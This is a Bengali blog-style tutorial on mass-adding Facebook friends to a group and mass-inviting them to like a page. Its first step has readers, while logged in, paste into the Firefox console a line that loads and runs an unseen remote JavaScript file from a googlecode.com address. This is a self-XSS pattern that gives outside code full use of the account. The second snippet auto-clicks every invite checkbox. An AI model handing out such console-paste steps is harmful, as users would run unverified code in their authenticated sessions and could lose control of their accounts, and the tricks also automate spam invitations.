আমরা ফেসবুক গ্রুপ নিয়ে কমবেশি সবাই জানি। ফেসবুক গ্রুপ হচ্ছে কোন বিষয় নিয়ে বিস্তারিত মত প্রকাশের সবচেয়ে উত্তম উপায়। তবে গ্রুপ এ সদস্য বাড়ানো একটু সময় সাপেক্ষ ব্যাপার। একজন একজন করে বন্ধু অ্যাড করাও অনেক বিরক্তিকর কাজ। এই বিরক্তি কমানোর জন্য আজ আমি নিয়ে এলাম একটি ট্রিক্স। যার মাধ্যমে খুব সহজে অল্প সময়ে আপনার বন্ধু তালিকার সবাই কে অ্যাড করতে পারবেন... আসুন শুরু করা যাক... নিচের স্টেপ গুলো মনোযোগ দিয়ে ফলো করুন...
১ঃ আপনার firefox ব্রাউজার ওপেন করুন।
২ঃ facebook এ লগইন করুন। আপনার কাঙ্খিত গ্রুপ এ প্রবেশ করুন।
৩ঃ এবার Ctrl + Shift + K চাপুন। নিচের ছবির মত একটি একটি window আসবে। ছবির নিচে দেখুন লেখা আছে (এখানে paste করুন)। সেখানে নিচের কোড টি কপি করে পেস্ট করুন।
document.body.appendChild(document.createElement('script')).src='http://group-invites.googlecode.com/files/group-invite.js';
৪ঃ এবার Enter চাপুন।
৫ঃ এবার Ctrl + Shift + K আবার চাপুন। আপনার কাজ শেষ। দেখবেন নিচের ছবির মত বন্ধু অ্যাড হচ্ছে।
****সতর্কতাঃ সব ফ্রেন্ড অ্যাড হওয়ার আগে লগ আউট করবেন না।
###এবার আসুন কিভাবে পেজ এ like পাবার জন্য সব বন্ধু কে request পাঠাবেন তা জানিঃ
১ঃ আপনার পেজ টি ওপেন করুন। সবার উপরে Buid audience এ ক্লিক করুন। invite friends এ ক্লিক করুন। একটা লিস্ট আসবে। লিস্ট এ স্ক্রল করে শেষ ফ্রেন্ড পর্যন্ত দেখুন।
২ঃ বার Ctrl + Shift + K চাপুন। নিচের ছবির মত একটি একটি window আসবে। ছবির নিচে দেখুন লেখা আছে (এখানে paste করুন)। সেখানে নিচের কোড টি কপি করে পেস্ট করুন।
javascript:elms=document.getElementsByName("checkableitems[]");for (i=0;i < elms.length;i++){if (elms[i].type="checkbox" )elms[i].click()};
৩ঃ এবার Enter চাপুন।
৪ঃ এবার Ctrl + Shift + K আবার চাপুন। এবার submit এ ক্লিক করুন।
ধন্যবাদ সবাই কে... আমার লেখা আপনার কাজে লাগলে প্লিজ আমার পেজ এ লাইক দিবেন
https://www.facebook.com/mybdmobile
পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon